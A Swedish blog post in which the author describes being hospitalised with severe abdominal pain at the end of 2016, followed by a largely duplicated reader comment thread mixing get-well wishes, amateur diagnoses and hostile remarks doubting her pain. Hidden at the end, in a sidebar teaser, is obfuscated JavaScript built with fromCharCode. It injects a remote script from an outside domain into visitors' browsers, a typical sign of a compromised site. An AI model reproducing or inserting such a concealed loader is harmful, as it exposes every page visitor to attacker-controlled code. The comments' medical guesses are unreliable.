Hej från sjukhuset!

image

Hej! 2016 har varit turbulent, minst sagt! Ett intensivt år med prövningar för både kropp och själ.

2016 blir ett år jag aldrig glömmer! Men inget ont som inte har något gott med sig. Jag har vuxit, och växer enormt genom allt jag i år gått igenom.

Jag är en positiv j*vel i mig själv, och försöker att ta lärdom och ta med mig alla nya erfarenheter på både gott och ont och använda det till något bra.

Livet blir inte alltid riktigt som planerat!  Att avsluta året här på Danderyds sjukhus  ingick inte heller i planeringen….. Verkligen inte!

Jag kom in igår. Efter jobbet. Jag kan säga såhär, sjukhuset ör överfullt! Katastrofalt mycket att göra.

Men redan från ambulans personalen och ALLA dom jag mött hittills så har dom verkligen varit fantastiska! Omtänksammas hjälpsamma och genuina.. Jag föll ihop i fruktansvärda buksmärtor, kramper som förvärkar och förlossnings värkar. Jag kan ärligt säga att jag aldrig upplevt denna smärtan förut! Aldrig…. 

Man trodde det var bli blindtarmen och bokade tid för OP inatt. Men Op ställdes in och vi ska göra ytterligare några undersökningar.

Jag är dåsig av smärtstillande, men är mer än tacksam för det. Det tar nämligen bort topparna på attackern.

-Som sagt 2016 har INTE varit mitt år!

Att släppa taget betyder inte att man förlorar eller ger upp. Det är början på något nytt”

 jag är mer än redo inför 2017! -Bring it on!

Nu vill jag hitta felet, laga mig. Checka ut härifrån och avsluta sett bedrövliga år och med positiv anda ge ta emot allt vad 2017 innebär!  

Nu ska jag strax undersökas, igen…

Ville bara ge dig en kort uppdatering. Blir det bloggtystnad ett tag så vet du varför….

Stor kram /My Martens

120 Komentarer

 1. Låter som gallanfall.
  Helvetes smärtor.
  Hoppas dem hittar det, antagligen blir det operation senare.
  Om det är gallan; undvik ägg, äppelskal, päron, fett, paprika..
  Krya på dig!

 2. Oj, oj stackars dig. Bra iaf att du får ett bra bemötande och att du blir väl omhändertagen. Vila nu och berätta mer om hur du mår då du mår bättre. Kram❤

 3. Kära My. Så tufft som du haft det ska ingen behöva ha det. Men kroppen säger ifrån ibland när vi inte själva förmår stänga av. Krya på dig. Kram.

 4. Hej. Brukar läsa din blogg och följa dig på instagram, gjort sedan mamma söker, love it. Men reagerade på en sak, ”Jag är en positiv jävel i mig själv” skrev du ovan. Och nej det är du inte, fel självbild. Du är en av de mest gnälliga av bloggar jag läser och klagar allt och jämnan på allt. Säger absolut inte det är fel, livet är inte perfekt. Men du är ingen positiv person. Punkt.

  • Där går våra meningar isär! Jag har också hängt här ett tag och tycker inte alls att det gnälls. Man skulle däremot kunna förvänta sig det när man har genomgått sådana saker som My har, men tvärtom tycker jag att hon vänder saker och ting på ett beundransvärt sätt.
   Jag är imponerad av My!

  • Minna : Hade du varit i My’s situation det senaste året SÅ hade du nog fan inte krypit ut ur hålan du kom ifrån….Det hade du inte klarat! Det är ju DU som är negativ … My har klarat av förbaskat mycket detta året SÅ negativ? Nej HON är positiv….!!!
   Du Minna och jag läser nog inte samma blogg….
   Önskar dig ett Gott Nytt Positiv År!
   Annika

   • Jag har inte varit i hennes situation men i värre då jag förlorade både företag, en dotter och min mamma, och fick hjärnblödning inom loppet av 7 månader. Så jag tar mig rätten att krypa ur min lilla håla. Och jag kan också vara negativ, som jag skrev är det inget fel och likaså att jag tycker om henne. Skrev min åsikt gällande positivitet och det HON skrev var inte om nu när hon ligger på sjukhus. Såklart hon får vara negativ, vem hade inte varit. Jag har läst hennes blogg i flera år (och älskar den), oxh skrev att JAG tycker hon är negativ över lag, inte bara när det kommer till det tunga i livet där man är mänskligt nere.

  • Och detta skriver du på ett inlägg som handlar om att My är på sjukhus. Vad sägs om krya på dig istället?!
   Hoppas du mår bättre snart My. Ta hand om dig.

 5. Hej!
  Jag hoppas verkligen att de kan hjälpa dig och att du ska få må bättre snart. Be dem undersöka om det kan vara endometrios. Mitt ter sig inte alls som smärta vid menatruation eller liknande utan kommer attackvis och känns precis som att man ska föda barn vilken sekund som helst. Hoppas verkligen se hittar felet. Mvh Jonna

 6. Krya på dig! Hoppas att det inte är något allvarligt och att du snabbt får operation om det är det som krävs! Svenska sjukvården är kanon när det är akut (det vet jag efter två akuta inläggningar förra året) Synd bara att den inte är lika effektiv innan, så att det slipper bli akut ?
  Kram och hoppas du får ett frisk och bra år 2017

 7. Oj oj, hoppas det går över snabbt! Ja 2016 var ett riktigt skitår, men jag tror faktiskt att 2017 blir ett mycket bättre år, på alla plan! Krya på dig! Kram!

 8. Låter som gallanfall.
  Helvetes smärtor.
  Hoppas dem hittar det, antagligen blir det operation senare.
  Om det är gallan; undvik ägg, äppelskal, päron, fett, paprika..

  Krya på dig!

 9. Oj, oj stackars dig. Bra iaf att du får ett bra bemötande och att du blir väl omhändertagen. Vila nu och berätta mer om hur du mår då du mår bättre. Kram❤

 10. Kära My. Så tufft som du haft det ska ingen behöva ha det. Men kroppen säger ifrån ibland när vi inte själva förmår stänga av. Krya på dig. Kram.

 11. Hej. Brukar läsa din blogg och följa dig på instagram, gjort sedan mamma söker, love it. Men reagerade på en sak, ”Jag är en positiv jävel i mig själv” skrev du ovan. Och nej det är du inte, fel självbild. Du är en av de mest gnälliga av bloggar jag läser och klagar allt och jämnan på allt. Säger absolut inte det är fel, livet är inte perfekt. Men du är ingen positiv person. Punkt.

  • Där går våra meningar isär! Jag har också hängt här ett tag och tycker inte alls att det gnälls. Man skulle däremot kunna förvänta sig det när man har genomgått sådana saker som My har, men tvärtom tycker jag att hon vänder saker och ting på ett beundransvärt sätt.
   Jag är imponerad av My!

  • Minna : Hade du varit i My’s situation det senaste året SÅ hade du nog fan inte krypit ut ur hålan du kom ifrån….Det hade du inte klarat! Det är ju DU som är negativ … My har klarat av förbaskat mycket detta året SÅ negativ? Nej HON är positiv….!!!
   Du Minna och jag läser nog inte samma blogg….
   Önskar dig ett Gott Nytt Positiv År!
   Annika

   • Jag har inte varit i hennes situation men i värre då jag förlorade både företag, en dotter och min mamma, och fick hjärnblödning inom loppet av 7 månader. Så jag tar mig rätten att krypa ur min lilla håla. Och jag kan också vara negativ, som jag skrev är det inget fel och likaså att jag tycker om henne. Skrev min åsikt gällande positivitet och det HON skrev var inte om nu när hon ligger på sjukhus. Såklart hon får vara negativ, vem hade inte varit. Jag har läst hennes blogg i flera år (och älskar den), oxh skrev att JAG tycker hon är negativ över lag, inte bara när det kommer till det tunga i livet där man är mänskligt nere.

  • Och detta skriver du på ett inlägg som handlar om att My är på sjukhus. Vad sägs om krya på dig istället?!

   Hoppas du mår bättre snart My. Ta hand om dig.

 12. åh det lät int bra, men hoppas det inte behövs operation! Du har verkligen vuxit det senaste året måste jag säga, vilken kvinna du blivit, så positiv och stark. Du ska verkligen vara stolt över dig själv tycker jag fina My. Krya på dig nu och hoppas det går bra med allt.

 13. Hej…..låter precis som jag var med om för 2 veckor sen buksmärtor ambulans smärtstillande o värkar från helvetet….de hittade en stor polyper i livmodern. Den ska opereras bort nu i januari så skönt o veta. Hoppas det reder sig för dig också. Mvh Jessica

 14. Hej!
  Jag hoppas verkligen att de kan hjälpa dig och att du ska få må bättre snart. Be dem undersöka om det kan vara endometrios. Mitt ter sig inte alls som smärta vid menatruation eller liknande utan kommer attackvis och känns precis som att man ska föda barn vilken sekund som helst. Hoppas verkligen se hittar felet. Mvh Jonna

 15. Krya på dig! Hoppas att det inte är något allvarligt och att du snabbt får operation om det är det som krävs! Svenska sjukvården är kanon när det är akut (det vet jag efter två akuta inläggningar förra året) Synd bara att den inte är lika effektiv innan, så att det slipper bli akut 😮
  Kram och hoppas du får ett frisk och bra år 2017

 16. Oj oj, hoppas det går över snabbt! Ja 2016 var ett riktigt skitår, men jag tror faktiskt att 2017 blir ett mycket bättre år, på alla plan! Krya på dig! Kram!

 17. åh det lät int bra, men hoppas det inte behövs operation! Du har verkligen vuxit det senaste året måste jag säga, vilken kvinna du blivit, så positiv och stark. Du ska verkligen vara stolt över dig själv tycker jag fina My. Krya på dig nu och hoppas det går bra med allt.

 18. Hej…..låter precis som jag var med om för 2 veckor sen buksmärtor ambulans smärtstillande o värkar från helvetet….de hittade en stor polyper i livmodern. Den ska opereras bort nu i januari så skönt o veta. Hoppas det reder sig för dig också. Mvh Jessica

 19. Oj, din stackare. 2016 har verkligen inte varit ditt år. Hoppas att det inte är något allvarligt så att du kan fira in 2017 som förhoppningsvis blir mycket bättre än 2016.

 20. Nej, jag tror faktiskt inte att det är så stora fel på dig My! Hade du haft riktigt ont hade du inte engagerat dig i att posera halvnaken för en bild till bloggen, sorry men det är inte trovärdigt.

 21. Oj, din stackare. 2016 har verkligen inte varit ditt år. Hoppas att det inte är något allvarligt så att du kan fira in 2017 som förhoppningsvis blir mycket bättre än 2016.

 22. Stackars dig My! ?
  Nu får det väl ändå vara slut på allt trist som du har/hade i ditt liv. ( vet att du har mycket roligt och fint att vara tacksam för oxå ) Har oxå haft sådan smärta imagen. De trodde först att det var blindtarmen som spökade MEN de var cystor på äggstockarna som hade brustit. Fy tusan vilken smärta. Föder hellre barn och det säger mycket om mig…. Hoppas dem hittar felet snabbt! KryaPåDigKramarIMassor // Annika

 23. Nej, jag tror faktiskt inte att det är så stora fel på dig My! Hade du haft riktigt ont hade du inte engagerat dig i att posera halvnaken för en bild till bloggen, sorry men det är inte trovärdigt.

 24. Nej, jag tror inte heller det är något allvarligt smärtsamt som tarmvred, njursten eller liknande. Det gör så förbannat ont att man inte orkar stå och tänka på mobilen en gång. Man står inte rakryggad och fotar sig själv då. Det hjälper inte ens med starka morfinsprutor. Så fruktansvärt allvarligt tror jag inte heller att det är. Med det sagt, inte sagt att du inte har ont. Det kan man ha. Märkligt att dom satte droppet i armvecket dessutom.

  • L:. Ser du att det är en grön venfol hon har i armvecket. En grövre och har man mycket smärtor kan venerna på handryggen dra ihop sig så man kan ha svårt få in ventil ”nål” och föredrar armvecket! Krya

  • Märkligt med dropp i armvecket? Varför tycker du det?
   Det är lika vanligt som att ha den i handryggen. Om inte vanligare.
   Och alla hanterar vi smärta på olika sätt. Din smärt gräns är väl i lägsta laget. Morfinet tar bort udden av smärtan, den allra värsta som vi oftast inte kan hantera. Så inget konstigt att hon kan stå rakt, för tillfället iallafall.

   • Jag har nog både mer erfarenhet och kunskap än du Saga.
    Låg smärttröskel, nej det har jag inte. Erfarenhet och kunskap, det har jag däremot. Jag tycker inte syrror ska sätta nål i armvecket. Tecken på dålig teknik och sämre kunskap. Det är vad jag tycker, med det inte sagt att man inte gör det, för som synes så görs det ju av somliga.

 25. Stackars dig My! 🙁
  Nu får det väl ändå vara slut på allt trist som du har/hade i ditt liv. ( vet att du har mycket roligt och fint att vara tacksam för oxå ) Har oxå haft sådan smärta imagen. De trodde först att det var blindtarmen som spökade MEN de var cystor på äggstockarna som hade brustit. Fy tusan vilken smärta. Föder hellre barn och det säger mycket om mig…. Hoppas dem hittar felet snabbt! KryaPåDigKramarIMassor // Annika

 26. Alltså vilka människor det finns…..”vilken tur att sonen åkt till sin pappa” eller ” stackars katten som är ensam hemma ” åh nej du kan knappt ha ont eller ha något fel då du kan ta ett foto av dig lite halvnaken…. alltså på riktugt , vem behöver vänner när man har sånn hemska ovänner och troll på sin blogg!?!? Vilka är ni? Att döma är ni negativa oförskämda tråkiga hemska troll som ingen vill vara vän med! Ni kanske är lite avis på my som är yngre snyggare än ni själva? Son är en fighter en super morsa tjej och har tagit sig dit av sin egna vilja ! Du My jag skickar styrkan att fixa även denna pärs, inget vidare med kolik smärtor i magen, kan vara allt från njursten ( har haft det själv 2 gånger) eller gallsten kommer oftast i attacker kraftiga så man viker sig av smärta. Vården kommer ge dig all hjälp du behöver, tur det finns smärtstillande att ta till och dropp och ev att du läggs in om så behövs,! Det ska inga botox troll komma med kommentarer om att inget är fel på dig utan det bedömer proffs!!!! Jag hejar på dig och jag håller alla tummar att du blir bra och återställd! Krya på dig fina du❤️Kram från mig till dig ❤️

 27. Nej, jag tror inte heller det är något allvarligt smärtsamt som tarmvred, njursten eller liknande. Det gör så förbannat ont att man inte orkar stå och tänka på mobilen en gång. Man står inte rakryggad och fotar sig själv då. Det hjälper inte ens med starka morfinsprutor. Så fruktansvärt allvarligt tror jag inte heller att det är. Med det sagt, inte sagt att du inte har ont. Det kan man ha. Märkligt att dom satte droppet i armvecket dessutom.

  • L:. Ser du att det är en grön venfol hon har i armvecket. En grövre och har man mycket smärtor kan venerna på handryggen dra ihop sig så man kan ha svårt få in ventil ”nål” och föredrar armvecket! Krya

  • Märkligt med dropp i armvecket? Varför tycker du det?
   Det är lika vanligt som att ha den i handryggen. Om inte vanligare.
   Och alla hanterar vi smärta på olika sätt. Din smärt gräns är väl i lägsta laget. Morfinet tar bort udden av smärtan, den allra värsta som vi oftast inte kan hantera. Så inget konstigt att hon kan stå rakt, för tillfället iallafall.

   • Jag har nog både mer erfarenhet och kunskap än du Saga.
    Låg smärttröskel, nej det har jag inte. Erfarenhet och kunskap, det har jag däremot. Jag tycker inte syrror ska sätta nål i armvecket. Tecken på dålig teknik och sämre kunskap. Det är vad jag tycker, med det inte sagt att man inte gör det, för som synes så görs det ju av somliga.

 28. Alltså vilka människor det finns…..”vilken tur att sonen åkt till sin pappa” eller ” stackars katten som är ensam hemma ” åh nej du kan knappt ha ont eller ha något fel då du kan ta ett foto av dig lite halvnaken…. alltså på riktugt , vem behöver vänner när man har sånn hemska ovänner och troll på sin blogg!?!? Vilka är ni? Att döma är ni negativa oförskämda tråkiga hemska troll som ingen vill vara vän med! Ni kanske är lite avis på my som är yngre snyggare än ni själva? Son är en fighter en super morsa tjej och har tagit sig dit av sin egna vilja ! Du My jag skickar styrkan att fixa även denna pärs, inget vidare med kolik smärtor i magen, kan vara allt från njursten ( har haft det själv 2 gånger) eller gallsten kommer oftast i attacker kraftiga så man viker sig av smärta. Vården kommer ge dig all hjälp du behöver, tur det finns smärtstillande att ta till och dropp och ev att du läggs in om så behövs,! Det ska inga botox troll komma med kommentarer om att inget är fel på dig utan det bedömer proffs!!!! Jag hejar på dig och jag håller alla tummar att du blir bra och återställd! Krya på dig fina du❤️Kram från mig till dig ❤️

 29. Alltså My, vilka enormt kompetenta läsare du har! Jag ser att Minna tydligen är kriminalpsykolog minst, som kan diagnostisera din personlighet så där klart och bestämt. Dessutom är hon så säker i sin profession att hon vågar sig på att avsluta diskussionen med punkt! Wow liksom!! Sen har vi Jenny som helt klart är läkare och kan diagnostisera dig och ditt mående bara genom att se på en bild. Hon har en framtida karriär som internetdoktor, helt klart. Sen har vi Eva som uppenbarligen är både veterinär och djurskyddsmyndighet i en och samma person! Med såna rådgivare här i kommentarerna kan ju ingenting gå fel!! ? Lycka till My! Jag är inte ett dugg religiös, men det finns en grej som man säger att Jesus sade och det var: Den som är utan skuld kan kasta första stenen. Tja, jag vet inte med er andra, men jag vet med mig själv att jag definitivt inte kan slänga ett sandkorn ens på nån annan. Så ni som ylar om trovärdighet, ärlighet och en massa andra moraliska epitet, lyft en spegel framför ditt ansikte och fundera på det där med stenar… Sköt om dig My! ?

 30. Fy så hemska kommentarer en del skriver. Vad gör ni på den här bloggen om den ändå bara stör er.
  Vart tog medmänskligheten vägen..
  Hoppas att du får all hjälp du behöver.
  Krya på dig fina My ❤️

 31. Alltså My, vilka enormt kompetenta läsare du har! Jag ser att Minna tydligen är kriminalpsykolog minst, som kan diagnostisera din personlighet så där klart och bestämt. Dessutom är hon så säker i sin profession att hon vågar sig på att avsluta diskussionen med punkt! Wow liksom!! Sen har vi Jenny som helt klart är läkare och kan diagnostisera dig och ditt mående bara genom att se på en bild. Hon har en framtida karriär som internetdoktor, helt klart. Sen har vi Eva som uppenbarligen är både veterinär och djurskyddsmyndighet i en och samma person! Med såna rådgivare här i kommentarerna kan ju ingenting gå fel!! 🙂 Lycka till My! Jag är inte ett dugg religiös, men det finns en grej som man säger att Jesus sade och det var: Den som är utan skuld kan kasta första stenen. Tja, jag vet inte med er andra, men jag vet med mig själv att jag definitivt inte kan slänga ett sandkorn ens på nån annan. Så ni som ylar om trovärdighet, ärlighet och en massa andra moraliska epitet, lyft en spegel framför ditt ansikte och fundera på det där med stenar… Sköt om dig My! 🙂

 32. Fy så hemska kommentarer en del skriver. Vad gör ni på den här bloggen om den ändå bara stör er.
  Vart tog medmänskligheten vägen..
  Hoppas att du får all hjälp du behöver.
  Krya på dig fina My ❤️

 33. Att tänka på katten Sture var väl bara omtänksamt tycker jag!
  Tror man kan uppfatta det skrivna ordet väldigt olika då man inte hör tonen i rösten mm.
  Jag uppfattade det iallafall som snällt. ( och så älskar jag katter förstås )
  Starka smärtor kan komma och gå och man vet inte hur det känns för någon annan. Så där kan det vara bra att tänka på att andra kan reagera olika än en själv.
  Krya på dig My!

 34. Krya på dig My!! Hoppas du är så hårdhudad att du INTE tar åt dig vad en del slänger ur sig här i kommentarsfältet!!! Tusen tack till Maria bl a, och SKÄMMES ta mig f-n, ni som helt krasst skriver att My inte kan ha ont ?? HUR vet ni det ?Baserat på ett blogginlägg och ett par foton??? Jag är så pass gammal att jag skulle kunna vara mormor åt My, och tänker med fasa på er elaka skribenter, och undrar i fall ni har barn ??? Och hört talas om näthat?? OM man inte trivs med att läsa en blogg, så gör då inte det.Skriv en egen istället!! Om man kommenterar en annan person, så gör det inte med personliga elaka, påhopp, utan konstruktivt, ifall man undrar över något.Det är f-n inte OK på en fläck att vara så rutten som några är. Direkt fegt och det, mina vänner, är inte ett smickrande karaktärsdrag heller. Gott Nytt År ?

 35. Hur orkar man hålla på och hacka på en person som uppenbarligen inte mår bra??? För att må bättre själv? Eller trycka ner ännu mer? Har man inget snällt att säga kan man likaväl hålla tyst för inte mår man bättre av att slänga skit på någon annan!
  Stor krya-på-kram till dig My! ?

 36. Att tänka på katten Sture var väl bara omtänksamt tycker jag!
  Tror man kan uppfatta det skrivna ordet väldigt olika då man inte hör tonen i rösten mm.
  Jag uppfattade det iallafall som snällt. ( och så älskar jag katter förstås )
  Starka smärtor kan komma och gå och man vet inte hur det känns för någon annan. Så där kan det vara bra att tänka på att andra kan reagera olika än en själv.
  Krya på dig My!

 37. Krya på dig My!! Hoppas du är så hårdhudad att du INTE tar åt dig vad en del slänger ur sig här i kommentarsfältet!!! Tusen tack till Maria bl a, och SKÄMMES ta mig f-n, ni som helt krasst skriver att My inte kan ha ont ?? HUR vet ni det ?Baserat på ett blogginlägg och ett par foton??? Jag är så pass gammal att jag skulle kunna vara mormor åt My, och tänker med fasa på er elaka skribenter, och undrar i fall ni har barn ??? Och hört talas om näthat?? OM man inte trivs med att läsa en blogg, så gör då inte det.Skriv en egen istället!! Om man kommenterar en annan person, så gör det inte med personliga elaka, påhopp, utan konstruktivt, ifall man undrar över något.Det är f-n inte OK på en fläck att vara så rutten som några är. Direkt fegt och det, mina vänner, är inte ett smickrande karaktärsdrag heller. Gott Nytt År 🙂

 38. Hur orkar man hålla på och hacka på en person som uppenbarligen inte mår bra??? För att må bättre själv? Eller trycka ner ännu mer? Har man inget snällt att säga kan man likaväl hålla tyst för inte mår man bättre av att slänga skit på någon annan!
  Stor krya-på-kram till dig My! 💕

 39. Krya på dig fina du! Och jisses ja jag kan inte annat än hålla med dig..hösten 2016 har varit en av de allra värsta perioderna i mitt liv hittills, usch fyfan spyr på denna höst säger jag bara..har mått skit rent ut sagt fysiskt denna höst och det har konstaterats att jag har ett medfött hjärtfel som jag ska opereras för i januari nu, är 20 år gammal. Men jag försöker att vara någorlunda positiv och blicka framåt och hoppas på att 2017 visar sig bli ett lyckligt och hälsosamt år med allt det mörka, onda och jobbiga bakom en..man lär ju sig av livets alla erfarenheter, bra som dåliga ? ❤

 40. Krya på dig fina du! Och jisses ja jag kan inte annat än hålla med dig..hösten 2016 har varit en av de allra värsta perioderna i mitt liv hittills, usch fyfan spyr på denna höst säger jag bara..har mått skit rent ut sagt fysiskt denna höst och det har konstaterats att jag har ett medfött hjärtfel som jag ska opereras för i januari nu, är 20 år gammal. Men jag försöker att vara någorlunda positiv och blicka framåt och hoppas på att 2017 visar sig bli ett lyckligt och hälsosamt år med allt det mörka, onda och jobbiga bakom en..man lär ju sig av livets alla erfarenheter, bra som dåliga 🙂 ❤

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/